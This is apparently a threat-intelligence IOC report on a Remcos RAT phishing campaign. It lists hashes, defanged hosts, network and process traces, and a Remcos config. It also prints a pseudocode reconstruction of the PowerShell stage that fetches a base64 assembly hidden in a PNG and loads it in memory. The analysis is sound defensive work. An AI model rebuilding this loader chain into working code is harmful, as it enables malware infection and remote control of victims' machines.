VRad

#remcos_190124

Jan 19th, 2024 (edited)
  1. #IOC #OptiData #VR #remcos #RAT #stego #pngbase64 #RegAsm #PowerShell
  2.  
  3. https://pastebin.com/EvXHfZUB
  4.  
  5. previous_contact:
  6. 18/01/24 https://pastebin.com/FL2fX362
  7. 25/12/23 https://pastebin.com/D535PVm3
  8. 21/12/23 https://pastebin.com/samYnJq6
  9. 30/11/23 https://pastebin.com/aG6XyqHN
  10. 13/11/23 https://pastebin.com/tbRpiGG5
  11. 06/02/23 https://pastebin.com/kjv5E8Au
  12.  
  13. FAQ:
  14. https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
  15.  
  16. attack_vector
  17. --------------
  18. email attach .docx (remote template injection, T1221) > fetch RTF .doc (Equation Editor, CVE-2017-11882 via EQNEDT32.EXE) > fetch .vbs (sandbox check) > fetch base64 blob from paste.ee > PowerShell fetches .png (base64 .NET loader between <<BASE64_START>>/<<BASE64_END>> markers, loaded reflectively in memory) > fetch .txt (reversed base64) > decode > inject Remcos into RegAsm.exe > C2 on tcp/2424
  19.  
  20. # # # # # # # #
  21. email_headers
  22. # # # # # # # #
  23. Date: 18 Jan 2024 22:57:35 -0800
  24. From: Velislav Deshev<info@cifogge.ooguy.com>
  25. Subject: RE: Потвърждение за плащане на фактура
  26. Received: from unknown (HELO mail0.cifogge.ooguy.com) ([79_141_163_23])
  27. Message-ID: <20240118225734.55E14297A16A5D59@cifogge.ooguy.com>
  28.  
  29. # # # # # # # #
  30. files
  31. # # # # # # # #
  32. SHA-256 fb4bc1cb8305aee8f54e592dd5fb22d4d84838d371d65521e103306ad929c9cd
  33. File name swift 19-1-2024.docx [ Microsoft Word 2007+ ] !Template Injection
  34. File size 30.64 KB (31376 bytes)
  35.  
  36. SHA-256 f745310bf10c1bc657b89f10f740c372bdf0cabed4b0f4f93782a6762fc6a38c
  37. File name microsoftdecidedtoup....doc [ Rich Text Format ] !11882 EQUATION
  38. File size 57.77 KB (59160 bytes)
  39.  
  40. SHA-256 5f7a77697b2eb9acc01489265be5c49dbba8aa1ea12f28930103abe205db7baa
  41. File name AItechnology.vbs [ JavaScript ] !Detect sandbox
  42. File size 13.94 KB (14272 bytes)
  43.  
  44. SHA-256 e9be870a568580ab6b5d0998e0170a230ddc2eb06698307f1bb9ced590ca14a4
  45. File name UE4Lk [ JavaScript ] !Base64 2 PowerShell
  46. File size 46.70 KB (47816 bytes)
  47.  
  48. SHA-256 f6dc3dc76e0d6e8d2035112c83a31aebbcc91656ec4202ffda6e08f591acd991
  49. File name uwp4228677.png [ PNG image data ] !Stego Loader BASE64_START
  50. File size 17.73 MB (18594320 bytes)
  51.  
  52. SHA-256 e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042
  53. File name GRM.txt [ Reverse Base64 ] !REMCOS encoded payload
  54. File size 644.00 KB (659456 bytes)
  55.  
  56. # # # # # # # #
  57. activity
  58. # # # # # # # #
  59.  
  60. PL_SCR wallpapercave_com / uwp / uwp4228677.png (LOADER)
  61. 172_232_189_7 / 5060 / GRM.txt (REMCOS)
  62.  
  63. C2 top_noforabusers1_xyz 147_124_215_172 : 2424
  64.  
  65.  
  66. netwrk
  67. --------------
  68. 104_21_64_92 dik_si 80 HTTP HEAD /wOBjE HTTP/1.1 Microsoft Office Existence Discovery
  69. 172_232_189_7 172_232_189_7 80 HTTP GET /ait/microsoftdecidedtoupdateentireprocessfromtheserviceofmsofficetoinbuildtechnologytoimplementtheprocess.doc ms-office;
  70. 172_232_189_7 172_232_189_7 80 HTTP GET /5060/AItechnology.vbs HTTP/1.1 Mozilla/4.0
  71. 188_114_97_9 paste_ee 80 HTTP GET /d/UE4Lk HTTP/1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  72. 188_114_97_9 paste_ee 443 TLSv1 Client Hello
  73. 104_22_53_71 wallpapercave_com 443 TLSv1.2 Client Hello
  74. 172_232_189_7 172_232_189_7 80 HTTP GET /5060/GRM.txt HTTP/1.1
  75. 147_124_215_172 2424 TLSv1.3 Client Hello
  76.  
  77. comp
  78. --------------
  79. WINWORD.EXE TCP 104_21_64_92 80 ESTABLISHED
  80. WINWORD.EXE TCP 172_232_189_7 80 ESTABLISHED
  81. EQNEDT32.EXE TCP 172_232_189_7 80 ESTABLISHED
  82. WScript.exe TCP 188_114_97_9 443 ESTABLISHED
  83. powershell.exe TCP 104_22_53_71 443 ESTABLISHED
  84. powershell.exe TCP 172_232_189_7 80 CLOSE_WAIT
  85. RegAsm.exe TCP 147_124_215_172 2424 ESTABLISHED
  86.  
  87. proc (observed sequence WINWORD.EXE > EQNEDT32.EXE > WScript.exe > powershell.exe > RegAsm.exe; note EQNEDT32.EXE is started with -Embedding, i.e. COM activation, so a parent/child rule keyed on WINWORD.EXE alone may miss that hop — key on EQNEDT32.EXE making network connections instead)
  88. --------------
  89.  
  90. C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
  91. "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  92. "C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\AItechnology.vbs"
  93. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = . . .
  94. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . . . ('172_232_189_7 / 5060 / GRM.txt' , 'C:\ProgramData\', 'LnkName','RegAsm')
  95.  
  96. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Copy-Item -Destination C:\ProgramData\Regasm.vbs
  97. C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
  98.  
  99. persist
  100. --------------
  101. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19.01.2024 14:09
  102. Path (file not found at analysis time): C:\ProgramData\Regasm.vbs.exe — the Run value points to Regasm.vbs.exe while the copied file is C:\ProgramData\Regasm.vbs, so this autorun entry appears broken as written; treat the registry value itself as the IOC
  103.  
  104. drop
  105. --------------
  106. %temp%\Temporary Internet Files\Content.IE5\*\AItechnology[1].vbs
  107. C:\Users\operator\AppData\Roaming\AItechnology[1].vbs
  108.  
  109. # # # # # # # #
  110. additional info
  111. # # # # # # # #
  112. powershell load remcos (reconstructed from the decoded UE4Lk stage; the PNG is read as UTF-8 text and the base64 between the markers is a .NET assembly loaded via Assembly.Load — nothing is written to disk at this step):
  113. --------------
  114. image_Url = 'wallpapercave_com / uwp / uwp4228677.png'
  115. web_Client = System.Net.WebClient
  116. image_Bytes = DownloadData(image_Url)
  117. image_Text = UTF8.GetString(image_Bytes)
  118. start_Flag = <<BASE64_START>>; endFlag = <<BASE64_END>>
  119. base64_Command = image_Text_Substring
  120. command_Bytes = Convert ::From_Base64String
  121. loaded_Assembly = [System_Reflection.Assembly] :: Load (command_Bytes)
  122. type = loaded_Assembly_GetType (Aspose.DrawingSpec.PkikAttrCertNB)
  123. method = Run . Invoke 172_232_189_7 / 5060 / GRM.txt desativado Regasm C:\ProgramData\ LnkName RegAsm
  124.  
  125. remcos config
  126. --------------
  127. {
  128. "Version": "4.9.3 Pro",
  129. "Host:Port:Password": "top_noforabusers1_xyz : 2424 : 1",
  130. "Assigned name": "RemoteHost",
  131. "Connect interval": "1",
  132. "Install flag": "Disable",
  133. "Setup HKCU\\Run": "Enable",
  134. "Setup HKLM\\Run": "Enable",
  135. "Install path": "Application path",
  136. "Copy file": "remcos.exe",
  137. "Startup value": "Disable",
  138. "Hide file": "Disable",
  139. "Mutex": "Rmc-M4OLK2",
  140. "Keylog flag": "0",
  141. "Keylog path": "Application path",
  142. "Keylog file": "logs.dat",
  143. "Keylog crypt": "Disable",
  144. "Hide keylog file": "Disable",
  145. "Screenshot flag": "Disable",
  146. "Screenshot time": "10",
  147. "Take Screenshot option": "Disable",
  148. "Take screenshot title": "",
  149. "Take screenshot time": "5",
  150. "Screenshot path": "AppData",
  151. "Screenshot file": "Screenshots",
  152. "Screenshot crypt": "Disable",
  153. "Mouse option": "Disable",
  154. "Delete file": "Disable",
  155. "Audio record time": "5"
  156. }
  157.  
  158. # # # # # # # #
  159. VT & Intezer
  160. # # # # # # # #
  161. https://www.virustotal.com/gui/file/fb4bc1cb8305aee8f54e592dd5fb22d4d84838d371d65521e103306ad929c9cd/details
  162. https://www.virustotal.com/gui/file/f745310bf10c1bc657b89f10f740c372bdf0cabed4b0f4f93782a6762fc6a38c/details
  163. https://www.virustotal.com/gui/file/5f7a77697b2eb9acc01489265be5c49dbba8aa1ea12f28930103abe205db7baa/details
  164. https://www.virustotal.com/gui/file/e9be870a568580ab6b5d0998e0170a230ddc2eb06698307f1bb9ced590ca14a4/details
  165. https://www.virustotal.com/gui/file/f6dc3dc76e0d6e8d2035112c83a31aebbcc91656ec4202ffda6e08f591acd991/details
  166. https://www.virustotal.com/gui/file/e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042/details
  167.  
  168. VR